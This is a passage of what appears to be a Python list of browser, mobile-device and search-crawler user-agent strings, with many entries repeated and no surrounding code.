'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
